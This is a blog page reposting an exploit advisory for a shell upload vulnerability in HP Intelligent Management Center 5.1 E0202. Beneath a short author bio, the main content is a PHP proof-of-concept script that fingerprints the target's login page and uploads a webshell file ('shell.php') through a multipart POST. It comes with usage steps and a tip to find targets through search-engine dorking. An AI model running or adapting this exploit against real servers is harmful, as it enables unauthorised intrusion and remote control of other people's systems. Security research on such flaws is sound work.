Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

HP Intelligent Management Center 5.1 E0202 Shell Upload

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 106
=============================================================================================================================================
| # Title : HP Intelligent =============================================================================================================================================
| # Title : HP Intelligent Management Center 5.1 E0202 Shell Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://support.hpe.com/hpesc/public/docDisplay?docId=c03177356 |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: Upload a malicious PHP file (such as a Webshell) to the server.

[+] save code as poc.php.

[+] Set Target : line 54

[+] USage : php poc.php

[+] PayLoad :

<?php

function is_imc($target) {
$url = "$target/login.jsf";
$response = @file_get_contents($url);

if ($response !== false && strpos($response, "HP Intelligent Management Center") !== false) {
return true;
}
return false;
}

function upload_file($ip, $port, $target_uri, $upload_path, $local_file) {
if (!is_imc("http://$ip:$port$target_uri")) {
echo "$ip:$port - This isn't an HP Intelligent Management Center\n";
return;
}

$file_content = file_get_contents($local_file);
if ($file_content === false) {
echo "Failed to read local file: $local_file\n";
return;
}

$boundary = "----WebKitFormBoundary" . md5(time());
$eol = "\r\n";

$data = "--$boundary$eol";
$data .= "Content-Disposition: form-data; name=\"file\"; filename=\"" . basename($local_file) . "\"$eol";
$data .= "Content-Type: application/octet-stream$eol$eol";
$data .= $file_content . "$eol";
$data .= "--$boundary--$eol";

$opts = [
"http" => [
"method" => "POST",
"header" => "Content-Type: multipart/form-data; boundary=$boundary\r\n",
"content" => $data
]
];

$url = "http://$ip:$port$target_uri/$upload_path";
echo "$ip:$port - Uploading file...\n";
$response = @file_get_contents($url, false, stream_context_create($opts));

if ($response !== false) {
echo "$ip:$port - File uploaded successfully to $url\n";
} else {
echo "$ip:$port - File upload failed\n";
}
}

// Example usage
$ip = "192.168.1.1";
$port = 8080;
$target_uri = "/imc";
$upload_path = "uploads/shell.php"; // Adjust this path as needed
$local_file = "shell.php"; // Your payload file

upload_file($ip, $port, $target_uri, $upload_path, $local_file);

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Social Media Share